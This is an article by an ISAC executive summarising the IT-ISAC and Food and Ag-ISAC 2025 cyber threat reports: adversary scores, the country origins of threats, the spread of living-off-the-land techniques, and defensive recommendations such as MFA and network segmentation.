From cloud architecture to the global food supply, no sector is immune to the evolving sophistication of cyber threats. The findings from both the IT-ISAC’s and Food and Ag-ISAC’s recently released 2025 sector cyber threat reports reveal a reality in which companies of every sector face persistent adversaries, ranging from state-sponsored actors to coordinated cybercrime. These reports also demonstrate how technical shifts by adversaries and how global tensions create an increasingly complex threat environment for every organization, regardless of industry.
Accessing Risk: The PASS Frame work
To better understand the threat landscape and pinpoint high-risk threat actors, both ISACs utilize the Predictive Adversary Scoring System (PASS). Developed in collaboration with ISAC members and partners, PASS transforms raw intelligence into a priority list. It evaluates adversaries based on how recently they have been active, how frequently they target specific sectors, the complexity of their technical methods, and their primary motivations, assigning them a score from 0 to 100. This data-driven approach allows organizations to identify and focus on the actors most likely to pose a credible threat to their specific business.
The 2025 Threat Landscape at a Glance
Not surprisingly, the 2025 data shows that threat actors are active across multiple sectors. Analysts identified 77 active adversaries in the IT sector and 72 active adversaries in the food and agriculture sector. These actors do overlap across the different sectors, but their impact and scores may be different due to differences in motivation, frequency of attacks, and focus on targeting vulnerabilities in specific products and services.
Leading the threat profile are high-capability nation-state actors, most notably the Lazarus Group, which ranks first in both sectors, with scores of 89.0 (IT) and 84.0 (food and agriculture). This group maintains a persistent presence to facilitate state-sponsored theft and cryptocurrency revenue.
While the IT sector frequently faces groups like Sandworm (84.0), which focus on geopolitical disruption, the food and agriculture sector is increasingly targeted by ransomware-focused entities like Qilin and Akira. Furthermore, the rise of hacktivist groups like Dark Engine (76.0) in the agricultural space indicates that the global food supply has become a stage for ideological conflict.
Geopolitics on the Digital Front Line
The origin of these threats suggests a map of global competition and conflict. Russia based threat actors account for 48.4% of IT threats and a staggering 59.3% of food and agriculture threats. This ecosystem is a volatile mix of state-affiliated espionage and opportunistic ransomware gangs who use critical sectors as leverage for extortion.
China is home to the second largest of observed threat actors, accounting for 29% of IT threats and 25.4% of food and agriculture threats. Tactics here have notably shifted toward pre-positioning. Rather than immediate data theft, these actors embed themselves in telecommunications, cloud environments, and research networks to maintain long-term listening posts for future conflicts.
While Iran (11.3% in IT, 5.1% in food and agriculture) and North Korea (6.5% in IT, 6.8% in food and agriculture) host a smaller percentage of observed threat actors, these actors are highly capable and creative. Iranian actors are relentless in promoting the goals of the Iranian regime. While North Korean actors are most famous for using fraudulent remote-worker identities to bypass traditional perimeter security and provide financial resources to the North Korean regime, they have a range of skilled state sponsored actors.
Modern Tactics: The Rise of LOTL
One clear takeaway from both reports is the universal adoption of “living-off-the-land” (LOTL) techniques.
- 100% of identified adversaries in both sectors utilized native system tools such as PowerShell or WMI.
- Over 96% of observed actors across both industries modified existing malware to bypass traditional signature-based antivirus tools.
By using a computer’s own administrative tools, attackers blend in with legitimate traffic. This shift toward stealth is reflected in the high percentage of groups utilizing lengthy persistence and defense evasion (84.4% in IT and 94.4% in food and agriculture). Adversaries are prioritizing longevity over immediate disruption, often compromising third-party vendors – a tactic seen in roughly 80% of attacks in both sectors before a ransom is ever demanded.
Cultivating a Collective Defense
To counter a landscape defined by skill, stealth and persistence, organizations must strategically allocate their limited security resources to maximum effect. Based on actor behavior, the implementation of multi-factor authentication (MFA) remains a key mitigation. MFA creates a significant hurdle for attackers using stolen credentials.
Additionally, considering how attacks spread from corporate networks to operational environments, segmenting IT and operational technology (OT) environments can reduce risk. While there are business benefits to integrating IT with OT, from a security perspective, segmenting the networks ensures that a security breach in the corporate environment cannot migrate laterally to disrupt critical industrial control systems or production machinery. Companies should have a process to evaluate whether the security risk is worth the business benefit.
In addition, because attackers are hiding within legitimate tools, companies should increase monitoring for anomalous behavior. This does not mean that companies should stop looking for malicious files. However, traditional, file based detection approaches, while necessary, are no longer enough.
Finally, companies are encouraged to maintain recoverable backups and to implement, maintain, and practice incident response plans. No company is immune, so every company must be prepared for the possibility that they will be a victim. How a company responds to a breach can determine whether the company survives the incident or goes out of business.
Ultimately, the 2026 landscape demonstrates that the threat environment is too complex for any organization to stand alone. By participating in a shared intelligence network, companies can turn individual insights into collective strength and informed decision making, making the global infrastructure more resilient against the evolving threats. Voluntary engagement with industry peers serves as a cost-effective supplement to internal security teams and helps strengthen the sector as a whole.
About the Author
Scott C. Algeier is the Founder, President, and CEO of cybersecurity consulting firm Conrad, Inc., Executive Director of the Information Technology – Information Sharing and Analysis Center (IT-ISAC), and Executive Director of the Food and Agriculture – Information Sharing and Analysis Center. He has spent the past twenty years at the intersection of cybersecurity policy and operations. Previously, Scott was Manager for Homeland Security at the U.S. Chamber of Commerce, where he coordinated the U.S. Chamber’s critical infrastructure protection, cybersecurity, and disaster management public policy initiatives. Scott earned his Master’s degree in International Relations and European Studies from the University of Kent (England) and is an honors graduate of Gettysburg College.
